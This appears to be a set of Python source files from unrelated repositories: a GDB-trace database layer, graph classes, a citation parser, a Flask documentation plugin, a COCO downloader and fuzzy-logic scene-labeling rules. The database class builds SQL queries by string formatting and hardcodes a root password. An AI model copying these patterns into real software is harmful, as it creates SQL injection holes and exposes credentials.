self.execute("insert into " + self.table_prefix +
"BreakPoint(pid, lineNumber, funcName) VALUES (%s, %s, '%s')" % (pid, line_number, func_name))
    # Insert a function
    def insert_function(self, fid, func_name):
self.execute('insert into ' + self.table_prefix +
'Function(fid, funcName) VALUES (%s, "%s")' % (fid, func_name))
    # Insert one stack frame variable record
def insert_frame_var(self, bid, var_name, var_value, var_size):
self.execute('insert into ' + self.table_prefix +
'FrameVariable(bid, varName, varValue, varSize) ' +
'VALUES (%s, "%s", "%s", %s)' % (bid, var_name, var_value, var_size))
    # Insert a frame stack size
def insert_frame_stack_size(self, pid, tid, fid, size):
self.execute('insert into ' + self.table_prefix +
'FStackSize(pid, tid, fid, stackSize) VALUES (%s, %s, %s, %s)' %
(pid, tid, fid, size))
    # Insert the maximum stack size
def insert_max_stack_size(self, pid, tid, size):
self.execute('insert into ' + self.table_prefix +
'PStackSize(pid, tid, stackSize) VALUES (%s, %s, %s)' %(pid, tid, size))
    # Get the fid by function name
    def get_function_fid_by_name(self, func_name):
        self.execute('select fid from ' + self.table_prefix + 'Function where funcName="%s"' % str(func_name))
        fetch_one = self.cursor.fetchone()
        print "Fetched function id: " + str(fetch_one[0])
        return fetch_one[0]
    # Get the fid by bid
def get_fid_by_bid(self, bid):
self.execute('select funcName from ' + self.table_prefix + 'BreakPoint where bid=' + str(bid))
fetch_one = self.cursor.fetchone()
fid = self.get_fid_by_func_name(str(fetch_one[0]))
return fid
    # Get the fid by function name
def get_fid_by_func_name(self, func_name):
self.execute('select fid from ' + self.table_prefix + 'Function where funcName="%s"' % (str(func_name)))
return self.cursor.fetchone()[0]
    # Parse gdb breakpoint info and insert the breakpoints into the database
def info_breakpoint_handler(self, pid, gdb_info_breakpoint):
ss = gdb_info_breakpoint.split("\n")
for s in ss:
if 0 < s.find("breakpoint keep y"):
s2 = s.split()
s3 = s2[8].split(":")
self.insert_breakpoint(pid, s3[1], s2[6])
    # Add a directed edge a-->b
def insert_edge(self, pid, tid, func_name_a, func_name_b):
fid_a = self.get_fid_by_func_name(func_name_a)
fid_b = self.get_fid_by_func_name(func_name_b)
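        # Upsert: try to bump the edge counter first; if the edge row doesn't exist yet, insert it with cnt=1.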
try:
self.execute('select cnt from ' + self.table_prefix +
'FuncAdjacencyList where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, fid_a, fid_b))
cnt = int(self.cursor.fetchone()[0]) + 1
self.execute('update ' + self.table_prefix +
'FuncAdjacencyList set cnt=%s where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, cnt, fid_a, fid_b))
except Exception:
cnt = 1
self.execute('insert into ' + self.table_prefix +
'FuncAdjacencyList(pid, tid, parFid, fid, cnt) VALUES (%s, %s, %s, %s, %s)' %
(pid, tid, fid_a, fid_b, cnt))
    # Get the function list from gdb's "info b" output
def get_function_list(self, break_info):
func_list = []
string_list = break_info.split('\n')[1:]
for line in string_list:
word = line.split()
if len(word) >= 6:
func_list.append(word[6])
return func_list
    # Insert the given function list into the database
def insert_function_list(self, func_list):
fid = 0
        func_list = list(set(func_list))  # deduplicate
for func in func_list:
fid += 1
            self.insert_function(fid, func)
    # Check whether a table exists
def exist_table(self, table_name):
try:
self.execute('select * from ' + table_name)
return True
except Exception:
return False
    # Create a table
    def create_table(self, table_name):
        try:
            PyGdbUtil.log(0, "Creating table " + table_name)
            self.execute("create table if not exists " + table_name)
        except Exception as e:
            # print e
            PyGdbUtil.log(2, "Failed to create table " + table_name + "! Check the table prefix for illegal characters.")
    # Drop a table
    def drop_table(self, table_name):
        try:
            PyGdbUtil.log(0, "Dropping table " + table_name)
            self.execute('drop table if exists ' + table_name)
        except Exception as e:
            print e
            PyGdbUtil.log(2, 'Failed to drop table!')
    # Get a test case
def get_test_case_by_tid(self, tid):
self.execute("SELECT testStr FROM " + self.table_prefix + "TestCase WHERE tid='%s'" % tid)
return self.cursor.fetchone()[0]
    # Get the total number of test cases
def get_test_case_cnt(self):
self.execute('SELECT max(tid) FROM ' + self.table_prefix + 'TestCase')
return int(self.cursor.fetchone()[0])
    # Get the breakpoint list of a given program
    def get_breakpoint_list(self, pid):
        self.execute('SELECT lineNumber FROM ' + self.table_prefix + 'BreakPoint WHERE pid="%s"' % pid)
        rows = self.cursor.fetchall()
        return [x[0] for x in rows]
    # Execute a SQL statement
def execute(self, sql_cmd):
return self.cursor.execute(sql_cmd)
    # Commit the transaction
def commit(self):
self.connection.commit()
"""
==================================================================
下方是 RestFul API 直接需要用到的 api
我擦, 这个好像应该放到另一个工程里面 - -#
==================================================================
"""
# getWorstStackSize(String program String t1){} input1+program getWorstStackSize(){}
# tid + pid --> Worst Stack Size
def api_worst_stack_size(self, pid, tid):
pass
def api_max_stack_size(self, pid, tid, fid):
pass
    # Given the pid of the correct program, the pid of the program under comparison, and a set of test cases (tid list), return a True/False table of execution results
def api_result(self, correct_pid, test_pid, tid_list):
pass
    # Return the program's breakpoint list
def api_breakpoint_list(self, pid, tid):
pass
    # Function stack list at a breakpoint
def api_breakpoint_func_list(self, pid, breakpoint):
pass
    # Stack frame info at a breakpoint
def api_breakpoint_frame_info(self, pid, breakpoint):
pass
    # Return the adjacency list of the function call graph
def api_function_graph(self, pid, tid):
pass
    # Return the function list
def api_function_list(self, pid):
pass
if __name__ == '__main__':
print "PyGDB Database 测试模式"
try:
dbc = PyGdbDb('127.0.0.1', '3306', 'pygdb', 'root', 'Sbdljw1992')
        print 'Database connection established'
dbc.test()
dbc.connection.close()
        print 'Database connection closed successfully'
except Exception as e:
        print 'Fatal error: ' + str(e)
exit(-1)
```
|
{
"source": "je-c/Visualising-Graph-Traversals",
"score": 4
}
|
#### File: Visualising-Graph-Traversals/graph/edge.py
```python
class Edge:
"""
Edge Class
----------
Represents the edge between two vertices
Attributes:
* u (Vertex): The vertex connected.
* v (Vertex): The vertex connected.
"""
def __init__(self, u, v):
"""
Initialises the edge with two vertices
* :param u (Vertex): Vertex U connected with this edge.
* :param v (Vertex): Vertex V connected with this edge.
"""
self.u = u
self.v = v
def __eq__(self, other):
"""
Overrides the base equality so we can check that
two edges are equal to each other.
* :param other: The other object we are comparing
:return: Bool if equal
"""
# If it's the same class, then it should have the same vertices.
if isinstance(other, Edge):
return (other.u == self.v or other.u == self.u) \
and (other.v == self.u or other.v == self.v)
# If it's not the same class, it's not equal
return False
def __repr__(self):
"""
Defines the string representation of the edge.
"""
return "<{}-{}>".format(self.u, self.v)
def __hash__(self):
"""
Makes the class hashable
"""
return hash(repr(self))
```
#### File: Visualising-Graph-Traversals/graph/vertex.py
```python
class Vertex:
"""
Vertex Class
-------------
Represents an object on the map, with an X position and Y position.
Attributes:
* x_pos (float): The X position of the vertex.
* y_pos (float): The Y position of the vertex.
* edges (list) : The list of edges where this node is connected.
"""
def __init__(self, x_pos, y_pos, name='non-spec'):
"""
Initialises the vertex on the map.
* :param x_pos: The X position of this vertex on interval(-infinity <= x_pos <= infinity)
* :param y_pos: The Y position of this vertex on interval(-infinity <= y_pos <= infinity)
Argument Types:
:type x_pos: float
:type y_pos: float
"""
self.x_pos = x_pos
self.y_pos = y_pos
self.name = name
self.edges = []
def __eq__(self, other):
"""
Overriding the equality.
* :param other: The other object comaparing to.
:return: Bool if equal
"""
if isinstance(other, Vertex):
return other.x_pos == self.x_pos and other.y_pos == self.y_pos
return False
def __ne__(self, other):
"""
Implementing the not equal method. (vertex != other vertex)
* :param other: The other object to compare to.
:return: The bool if not equal.
"""
if isinstance(other, Vertex):
return other.x_pos != self.x_pos or other.y_pos != self.y_pos
return True
def __repr__(self):
"""
Defines the string representation of the object.
"""
return "V({}, {})".format(self.x_pos, self.y_pos)
def __hash__(self):
"""
Makes the object hashable.
"""
return hash(repr(self))
def add_edge(self, e):
"""
Adds the edge e to the set of edges.
* :param e: The new edge to add.
"""
self.edges.append(e)
def remove_edge(self, e):
"""
Removes the edge from the set of edges.
* :param e: The edge to remove.
"""
self.edges.remove(e)
def move_vertex(self, x_pos, y_pos):
"""
Sets the new position of the vertex.
* :param x_pos (float): The new X position of the vertex.
* :param y_pos (float): The new Y position of the vertex.
"""
self.x_pos = x_pos
self.y_pos = y_pos
```
|
{
"source": "jecxjo/dotfiles",
"score": 2
}
|
#### File: vim_pandoc/bib/citeproc.py
```python
from subprocess import check_output
import json
import re
try:
from vim_pandoc.bib.collator import SourceCollator
from vim_pandoc.bib.util import flatten
except:
from collator import SourceCollator
from util import flatten
# _bib_extensions {{{1
# Filetypes that citeproc.py will attempt to parse.
_bib_extensions = ["bib",\
"bibtex",\
"ris",\
"mods",\
"json",\
"enl",\
"wos",\
"medline",\
"copac",\
"xml"]
# _significant_tags {{{1
# Tags that citeproc.py will search in, together with scaling
# factors for relative importance. These are currently non-functional.
_significant_tags = {"id": 0.5,
"author": 1.0,
"issued": 1.0,
"title": 1.0,
"publisher": 1.0,
"abstract": 0.1}
# _variable_type {{{1
# Map of tags -> types.
_variable_type = {
"abstract": "plain",
"annote": "plain",
"archive": "plain",
"archive_location": "plain",
"archive-place": "plain",
"authority": "plain",
"call-number": "plain",
"citation-label": "plain",
"citation-number": "plain",
"collection-title": "plain",
"container-title": "plain",
"container-title-short": "plain",
"dimensions": "plain",
"doi": "plain",
"event": "plain",
"event-place": "plain",
"first-reference-note-number": "plain",
"genre": "plain",
"isbn": "plain",
"issn": "plain",
"jurisdiction": "plain",
"keyword": "plain",
"locator": "plain",
"medium": "plain",
"note": "plain",
"original-publisher": "plain",
"original-publisher-place": "plain",
"original-title": "plain",
"page": "plain",
"page-first": "plain",
"pmcid": "plain",
"pmid": "plain",
"publisher": "plain",
"publisher-place": "plain",
"references": "plain",
"reviewed-title": "plain",
"scale": "plain",
"section": "plain",
"source": "plain",
"status": "plain",
"title": "plain",
"title-short": "plain",
"url": "plain",
"version": "plain",
"year-suffix": "plain",
"chapter-number": "number",
"collection-number": "number",
"edition": "number",
"issue": "number",
"number": "number",
"number-of-pages": "number",
"number-of-volumes": "number",
"volume": "number",
"accessed": "date",
"container": "date",
"event-date": "date",
"issued": "date",
"original-date": "date",
"submitted": "date",
"author": "name",
"collection-editor": "name",
"composer": "name",
"container-author": "name",
"director": "name",
"editor": "name",
"editorial-director": "name",
"illustrator": "name",
"interviewer": "name",
"original-author": "name",
"recipient": "name",
"reviewed-author": "name",
"translator": "name"
}
class CSLItem: #{{{1
# This class implements various helper methods for CSL-JSON formatted bibliography
# entries.
def __init__(self, entry): #{{{2
self.data = entry
def as_array(self, variable_name): #{{{2
def plain(variable_contents): #{{{3
# Takes the contents of a 'plain' variable and splits it into an array.
return unicode(variable_contents).split('\n')
def number(variable_contents): #{{{3
return [unicode(variable_contents)]
def name(variable_contents): #{{{3
# Parses "name" CSL Variables and returns an array of names.
def surname(author):
# Concat dropping particle and non-dropping particle with family name.
return [" ".join((author.get("dropping-particle", ""),
author.get("non-dropping-particle", ""),
author.get("family", ""))).strip()]
def given_names(author):
return [author.get("given", "").strip()]
def literal_name(author):
# It seems likely there is some particular reason for the author being
# a literal, so don't try and do clever stuff like splitting into tokens...
return [author.get("literal", "").strip()]
names = []
for author in variable_contents:
name = ""
if "literal" in author:
name = literal_name(author)
else:
name = surname(author) + given_names(author)
names.append(name)
return names
def date(variable_contents): #{{{3
# Currently a placeholder. Will parse 'date' CSL variables and return an array of
# strings for matches.
def date_parse(raw_date_array):
# Presently, this function returns the date in yyyy-mm-dd format. In future, it
# will provide a variety of alternative forms.
date = [unicode(x) for x in raw_date_array]
return ["-".join(date)]
def date_parts(date_parts_contents):
                # Run date_parse on each element and collect the results.
response = []
for date in date_parts_contents:
response.extend(date_parse(date))
return response
def season(season_type):
# Not actually clear from the spec what is meant to go in here. Zotero doesn't
# 'do' seasons, and I can't work it out from the pandoc-citeproc source. Will
# try and make this work when I have useful internet
season_lookup = {1: "spring",
2: "summer",
3: "autumn",
4: "winter"}
return []
def circa(circa_boolean):
return []
def literal(date_string):
return [date_string]
date_function_lookup = {"date-parts": date_parts,
"season": season,
"circa": circa,
"literal": literal,
"raw": literal}
response = []
for element in variable_contents:
response.extend(date_function_lookup[element](variable_contents[element]))
return response
# }}}3
variable_contents = self.data.get(variable_name, False)
if variable_contents:
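            # eval() resolves the local parser function (plain/number/name/date) named by the variable's CSL type.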
return eval(_variable_type.get(variable_name, "plain"))(variable_contents)
else:
return []
def match(self, query): #{{{2
# Matching engine. Returns 1 if match found, 0 otherwise.
# Expects query to be a compiled regexp.
# Very simple, just searches for substrings. Could be updated
# to provide a 'matches' value for ranking? Using numbers here
# so as to permit this future application.
matched = False
for variable in _significant_tags:
for token in self.as_array(variable):
matched = matched or query.search(flatten(token))
if matched:
break
if matched:
return 1
else:
return 0
def matches(self, query): #{{{2
# Provides a boolean match response to query.
# Expects query to be a compiled regexp.
if self.match(query) == 0:
return False
else:
return True
def relevance(self, query): #{{{2
# Returns the relevance of an item for a query
query = re.compile(query, re.I)
relevance = float(0.0)
tags_matched = []
for tag in _significant_tags:
for token in self.as_array(tag):
if query.search(flatten(token)):
tags_matched.append(tag)
break
if tags_matched != []:
relevance = sum([_significant_tags[t] for t in tags_matched])
return relevance
class CiteprocSource: #{{{1
def __init__(self, bib): #{{{2
try:
raw_bib = json.loads(check_output(["pandoc-citeproc", "-j", bib]))
except:
raw_bib = []
self.data = [CSLItem(entry) for entry in raw_bib]
def __iter__(self): #{{{2
for a in self.data:
yield a
class CiteprocCollator(SourceCollator): #{{{1
def collate(self): #{{{2
data = []
for bib in self.find_bibfiles():
for item in CiteprocSource(bib):
if item.matches(re.compile(self.query, re.I)) and item not in data:
data.append(item)
data.sort(key=lambda i: i.relevance(self.query), reverse=True)
return [item.data for item in data]
```
|
{
"source": "jedahu/flog",
"score": 2
}
|
#### File: plugins/projects/__init__.py
```python
import asciicode
import asciidoc
import flask
import mimetypes
import os
import urlparse
from StringIO import StringIO
from flog.mime import mimetype
TEXT_MIMES = set([
'application/javascript'
])
class Plugin:
def __init__(self, app, conf):
self.app = app
self.root = conf['root']
self.text_mimes = set(conf.get('text_mimes', []))
self.text_mimes.update(TEXT_MIMES)
self.projects = conf['projects']
for name, val in self.projects.items():
if type(val) in (str, unicode):
                self.projects[name] = val = dict(source=val)
val['index'] = val.get('index', 'README')
val['manifest'] = val.get('manifest', 'doc_manifest')
val['commit'] = val.get('commit', 'master')
val['text_mimes'] = val.get('text_mimes', [])
def asciicode_or_redirect(self, commit, url_path, project=None, name=None):
index = None
if url_path == '' or url_path.endswith('/'):
index = project['index']
url_path = os.path.join(url_path, index)
full_url = os.path.join(project['source'].format(commit=commit), url_path)
base_url = '/' + os.path.join(self.root, name, commit)
manifest = []
paths = []
try:
manifest = self.manifest_list(project, name, commit)
paths = [x[1] for x in manifest if x[0] == 'path']
except Exception, e:
print 'projects plugin: no manifest list found:', e
@mimetype('text/html')
@self.app.source(full_url)
def asciicode_impl(src):
asciidoc_fn = self.asciicode_asciidoc()
log = []
args = dict(
inpath=full_url,
attrs=dict(flog_source_url_path=os.path.split(
os.path.join(base_url, url_path))[0].encode('utf-8')),
log_names=['name', 'section'],
log=log)
f = StringIO(src)
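            # Skip a UTF-8 byte-order mark at the start of the source, if present.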
pos = f.tell()
first = unicode(f.read(3), 'utf-8')
if u'\ufeff' != first:
f.seek(pos)
html = asciicode.process_string(asciidoc_fn, f, asciidoc_args=args).getvalue()
if type(html) is not unicode:
html = unicode(html, 'utf-8')
current_path = url_path
if url_path == '' or url_path.endswith('/'):
current_path = os.path.join(url_path, index)
names = [x[1]['target'] for x in log if x[0] == 'name']
headings = [x[1] for x in log if x[0] == 'section' and x[1]['level'] > 0]
github_info = {}
url_bits = urlparse.urlparse(full_url)
if url_bits.hostname == 'raw.github.com':
user, repo = url_bits.path[1:].split('/')[:2]
github_info = dict(user=user, repo=repo)
return flask.render_template('project.html',
prefix=os.path.join('/', self.root, name),
title=project.get('title', name),
current_path=current_path,
content=flask.Markup(html),
manifest=manifest,
headings=headings,
names=names,
commit=commit,
github_info=github_info)
mime, _ = mimetypes.guess_type(url_path, strict=False)
if ((mime and mime.startswith('text'))
or mime in self.text_mimes
or mime in project['text_mimes']
or url_path in paths):
return asciicode_impl()
return flask.redirect(full_url)
def asciicode_asciidoc(self):
c = self.app.config
def execute(infile, outfile, attrs={}, conf_files=[], **kwargs):
attrs.update({
'pygments': 'pygments',
'filter-modules': 'asciicode'
})
kwargs['attrs'] = attrs
default_conf_files = [c.ASCIIDOC_FLOG_CONF]
if c.ASCIIDOC_CONF:
default_conf_files.append(c.ASCIIDOC_CONF)
default_conf_files.append(os.path.join(os.path.dirname(__file__), 'asciidoc-html5.conf'))
kwargs['conf_files'] = default_conf_files + conf_files
asciidoc.execute(infile, outfile, **kwargs)
return execute
def asciicode_docs(self, name, commit, path):
if name not in self.projects:
            return flask.abort(404)
proj = self.projects[name]
return self.asciicode_or_redirect(commit, path, project=proj, name=name)
def asciicode_docs_index(self, name, commit):
if name not in self.projects:
            return flask.abort(404)
proj = self.projects[name]
return self.asciicode_or_redirect(commit, '', project=proj, name=name)
def asciicode_docs_prefix(self, name):
if name not in self.projects:
            return flask.abort(404)
proj = self.projects[name]
return flask.redirect(flask.url_for('asciicode_docs_index', name=name, commit=proj['commit']))
def manifest_list(self, project, name, commit):
manifest = project['manifest']
manifest_url = os.path.join(project['source'].format(commit=commit), project['manifest'])
@self.app.source(manifest_url)
def manifest_list_impl(src):
def filter(x):
return x.strip() != ''
def morph(x):
if x.startswith('= '):
return ('heading', x.strip()[2:])
return ('path', x.strip())
return [morph(x) for x in src.splitlines() if filter(x)]
return manifest_list_impl()
def init_for_flog(app, plug_conf):
plug = Plugin(app, plug_conf)
app.add_url_rule(
os.path.join('/' + plug.root, '<string:name>/'),
'asciicode_docs_prefix',
lambda name: plug.asciicode_docs_prefix(name))
app.add_url_rule(
os.path.join('/' + plug.root, '<string:name>', '<string:commit>/'),
'asciicode_docs_index',
lambda name, commit: plug.asciicode_docs_index(name, commit))
app.add_url_rule(
os.path.join('/' + plug.root, '<string:name>', '<string:commit>', '<path:path>'),
'asciicode_docs',
lambda name, commit, path: plug.asciicode_docs(name, commit, path))
```
|
{
"source": "jedavis82/scene_labeling",
"score": 3
}
|
#### File: scene_labeling/input/import_coco.py
```python
import fiftyone as fo
import fiftyone.zoo as foz
import os
import shutil
DATASET_DIR = './'
TRAIN_DIR = DATASET_DIR + 'coco-2017/train/data/'
VAL_DIR = DATASET_DIR + 'coco-2017/validation/data/'
OUTPUT_DIR = DATASET_DIR + 'coco_images/'
if not os.path.exists(DATASET_DIR):
os.makedirs(DATASET_DIR)
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
def main():
fo.config.dataset_zoo_dir = DATASET_DIR # Specify the output directory of the downloaded files
print(fo.config) # Verify the settings were updated correctly
dataset = foz.load_zoo_dataset(
"coco-2017",
splits=["train", "validation"],
classes=["person"],
label_types="detections",
max_samples=2000,
include_license=False
)
# Combine the training and validation images into one directory. Remove the JSON annotated files.
# This code performs object detection using YOLOv3 and does not rely on the annotations
train_images = os.listdir(TRAIN_DIR)
val_images = os.listdir(VAL_DIR)
for f in train_images:
shutil.move(os.path.join(TRAIN_DIR, f), OUTPUT_DIR)
for f in val_images:
shutil.move(os.path.join(VAL_DIR, f), OUTPUT_DIR)
# Clean up the downloaded annotation files
shutil.rmtree(DATASET_DIR + 'coco-2017/')
if __name__ == '__main__':
main()
```
#### File: scene_labeling/level_two_utils/electronics.py
```python
from skfuzzy import control as ctrl
import skfuzzy as fuzz
import numpy as np
from fuzzy_utils import create_universes_membership_functions
class ElectronicsRules:
def __init__(self, show_sim_result=None):
prox, over, spat = create_universes_membership_functions()
self.__show_sim_result = show_sim_result
self.__proximity = prox
self.__overlap = over
self.__spatial_relationships = spat
self.__create_universes_of_discourse()
self.__create_membership_functions()
self.__create_tv_rules()
self.__create_cell_phone_rules()
self.__create_device_rules()
def __create_universes_of_discourse(self):
"""
Universe of discourse:
TV: watching, not watching
Cell Phone: talking on, not talking on
Small Device: using, not using
"""
self.__tv_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='tv_interaction')
self.__cell_phone_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1),
label='cell_phone_interaction')
self.__device_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='device_interaction')
def __create_membership_functions(self):
self.__tv_interaction['Watching'] = fuzz.trimf(self.__tv_interaction.universe, [0.4, 0.7, 1.0])
self.__tv_interaction['Not Watching'] = fuzz.trimf(self.__tv_interaction.universe, [0.0, 0.3, 0.6])
self.__cell_phone_interaction['Talking On'] = fuzz.trimf(self.__cell_phone_interaction.universe,
[0.4, 0.7, 1.0])
self.__cell_phone_interaction['Not Talking On'] = fuzz.trimf(self.__cell_phone_interaction.universe,
[0.0, 0.3, 0.6])
self.__device_interaction['Using'] = fuzz.trimf(self.__device_interaction.universe, [0.4, 0.7, 1.0])
self.__device_interaction['Not Using'] = fuzz.trimf(self.__device_interaction.universe, [0.0, 0.3, 0.6])
def __create_tv_rules(self):
# If overlap AND very close OR close OR medium THEN watching
self.__watching_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close'] |
self.__proximity['Medium']), self.__tv_interaction['Watching'])
        # IF no overlap AND very close OR close OR medium THEN watching
self.__watching_rule2 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']
| self.__proximity['Medium']),
self.__tv_interaction['Watching'])
# IF overlap AND far OR very far THEN not watching
self.__not_watching_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Far'] | self.__proximity['Very Far']),
self.__tv_interaction['Not Watching'])
        # IF no overlap AND far OR very far THEN not watching
self.__not_watching_rule2 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Far'] |
self.__proximity['Very Far']), self.__tv_interaction['Not Watching'])
self.__watching_ctrl = ctrl.ControlSystem([self.__watching_rule1, self.__watching_rule2,
self.__not_watching_rule1, self.__not_watching_rule2])
self.__watching_sim = ctrl.ControlSystemSimulation(self.__watching_ctrl, flush_after_run=100)
def __create_cell_phone_rules(self):
# IF overlap AND very close OR close THEN talking
self.__talking_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__cell_phone_interaction['Talking On'])
# IF overlap AND medium OR far OR very far THEN not talking
self.__not_talking_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']),
self.__cell_phone_interaction['Not Talking On'])
# IF no overlap THEN not talking
self.__not_talking_rule2 = ctrl.Rule(self.__overlap['No Overlap'],
self.__cell_phone_interaction['Not Talking On'])
self.__talking_ctrl = ctrl.ControlSystem([self.__talking_rule1, self.__not_talking_rule1,
self.__not_talking_rule2])
self.__talking_sim = ctrl.ControlSystemSimulation(self.__talking_ctrl, flush_after_run=100)
def __create_device_rules(self):
# IF overlap OR no overlap AND very close OR close AND left OR above left OR above OR above right OR right
# THEN using
self.__using_rule1 = ctrl.Rule((self.__proximity['Very Close'] | self.__proximity['Close']) &
(self.__spatial_relationships['Right1'] |
self.__spatial_relationships['Right2'] |
self.__spatial_relationships['Above Right'] |
self.__spatial_relationships['Above'] |
self.__spatial_relationships['Above Left'] |
self.__spatial_relationships['Left']), self.__device_interaction['Using'])
# IF overlap AND very close OR close THEN using
self.__using_rule2 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__device_interaction['Using'])
# IF overlap OR no overlap AND medium OR far OR very far AND any sr THEN not using
self.__not_using_rule1 = ctrl.Rule((self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']),
self.__device_interaction['Not Using'])
        # IF no overlap AND very close OR close AND below left OR below OR below right THEN not using
self.__not_using_rule2 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']) &
(self.__spatial_relationships['Below Left'] |
self.__spatial_relationships['Below'] |
self.__spatial_relationships['Below Right']),
self.__device_interaction['Not Using'])
self.__using_ctrl = ctrl.ControlSystem([self.__using_rule1, self.__using_rule2,
self.__not_using_rule1, self.__not_using_rule2])
self.__using_sim = ctrl.ControlSystemSimulation(self.__using_ctrl, flush_after_run=100)
def compute_tv_interaction(self, giou, iou, sr_angle):
self.__watching_sim.input['proximity'] = giou
self.__watching_sim.input['overlap'] = iou
self.__watching_sim.compute()
watching_result = self.__watching_sim.output['tv_interaction']
if self.__show_sim_result:
self.__tv_interaction.view(sim=self.__watching_sim)
watching = fuzz.interp_membership(self.__tv_interaction.universe, self.__tv_interaction['Watching'].mf,
watching_result)
not_watching = fuzz.interp_membership(self.__tv_interaction.universe, self.__tv_interaction['Not Watching'].mf,
watching_result)
membership = {'Watching': watching, 'Not Watching': not_watching}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Watching':
return None
else:
return ret_label
def compute_cell_phone_interaction(self, giou, iou, sr_angle):
self.__talking_sim.input['overlap'] = iou
self.__talking_sim.input['proximity'] = giou
self.__talking_sim.compute()
talking_result = self.__talking_sim.output['cell_phone_interaction']
if self.__show_sim_result:
self.__cell_phone_interaction.view(sim=self.__talking_sim)
talking = fuzz.interp_membership(self.__cell_phone_interaction.universe,
self.__cell_phone_interaction['Talking On'].mf, talking_result)
not_talking = fuzz.interp_membership(self.__cell_phone_interaction.universe,
self.__cell_phone_interaction['Not Talking On'].mf, talking_result)
membership = {'Talking On': talking, 'Not Talking On': not_talking}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Talking On':
return None
else:
return ret_label
def compute_device_interaction(self, giou, iou, sr_angle):
self.__using_sim.input['proximity'] = giou
self.__using_sim.input['overlap'] = iou
self.__using_sim.input['spatial_relationships'] = sr_angle
self.__using_sim.compute()
using_result = self.__using_sim.output['device_interaction']
if self.__show_sim_result:
self.__device_interaction.view(sim=self.__using_sim)
using = fuzz.interp_membership(self.__device_interaction.universe, self.__device_interaction['Using'].mf,
using_result)
not_using = fuzz.interp_membership(self.__device_interaction.universe,
self.__device_interaction['Not Using'].mf, using_result)
membership = {'Using': using, 'Not Using': not_using}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Using':
return None
else:
return ret_label
def compute_interaction(self, label, dom_cat, sub_cat, giou, iou, sr_angle):
if label == 'tv' or label == 'tvmonitor':
res_label = self.compute_tv_interaction(giou, iou, sr_angle)
return res_label
elif label == 'cell_phone':
res_label = self.compute_cell_phone_interaction(giou, iou, sr_angle)
return res_label
else:
res_label = self.compute_device_interaction(giou, iou, sr_angle)
return res_label
```
#### File: scene_labeling/level_two_utils/food.py
```python
from skfuzzy import control as ctrl
import skfuzzy as fuzz
import numpy as np
from fuzzy_utils import create_universes_membership_functions
class FoodRules:
def __init__(self, show_sim_result=None):
prox, over, spat = create_universes_membership_functions()
self.__show_sim_result = show_sim_result
self.__proximity = prox
self.__overlap = over
self.__spatial_relationships = spat
self.__create_universes_of_discourse()
self.__create_membership_functions()
self.__create_using_rules()
self.__create_drinking_rules()
self.__create_eating_rules()
def __create_universes_of_discourse(self):
"""
Food categories break down into:
Used: utensils->plate, fork, knife, spoon, bowl
Drink: bottle, wine glass, cup
Eaten: banana, apple, sandwich, orange, broccoli, carrot, hot dog, pizza, donut, cake
"""
self.__using_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='using_interaction')
self.__drinking_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='drinking_interaction')
self.__eating_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='eating_interaction')
def __create_membership_functions(self):
self.__using_interaction['Using'] = fuzz.trimf(self.__using_interaction.universe, [0.4, 0.7, 1.0])
self.__using_interaction['Not Using'] = fuzz.trimf(self.__using_interaction.universe, [0.0, 0.3, 0.6])
self.__drinking_interaction['Drinking'] = fuzz.trimf(self.__drinking_interaction.universe, [0.4, 0.7, 1.0])
self.__drinking_interaction['Not Drinking'] = fuzz.trimf(self.__drinking_interaction.universe, [0.0, 0.3, 0.6])
self.__eating_interaction['Eating'] = fuzz.trimf(self.__eating_interaction.universe, [0.4, 0.7, 1.0])
self.__eating_interaction['Not Eating'] = fuzz.trimf(self.__eating_interaction.universe, [0.0, 0.3, 0.6])
def __create_using_rules(self):
"""
These rules are for utensils, plates, bowls.
A person is only using a utensil if they overlap and are in very close proximity
"""
# IF overlap AND very close OR close THEN using
self.__using_rule = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__using_interaction['Using'])
# IF overlap AND medium OR far OR very far THEN not using
self.__not_using_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']), self.__using_interaction['Not Using'])
# IF no overlap THEN not using
self.__not_using_rule2 = ctrl.Rule(self.__overlap['No Overlap'], self.__using_interaction['Not Using'])
self.__using_ctrl = ctrl.ControlSystem([self.__using_rule, self.__not_using_rule1, self.__not_using_rule2])
self.__using_sim = ctrl.ControlSystemSimulation(self.__using_ctrl, flush_after_run=100)
def __create_drinking_rules(self):
"""
These rules are for person drinking from object.
A person is only drinking if they overlap the object and are in very close proximity.
Very strict rules, but avoids erroneous labels
"""
self.__drinking_rule = ctrl.Rule(self.__overlap['Overlap'] & self.__proximity['Very Close'],
self.__drinking_interaction['Drinking'])
self.__not_drinking_rule1 = ctrl.Rule(self.__overlap['No Overlap'], self.__drinking_interaction['Not Drinking'])
self.__not_drinking_rule2 = ctrl.Rule(self.__overlap['Overlap'] &
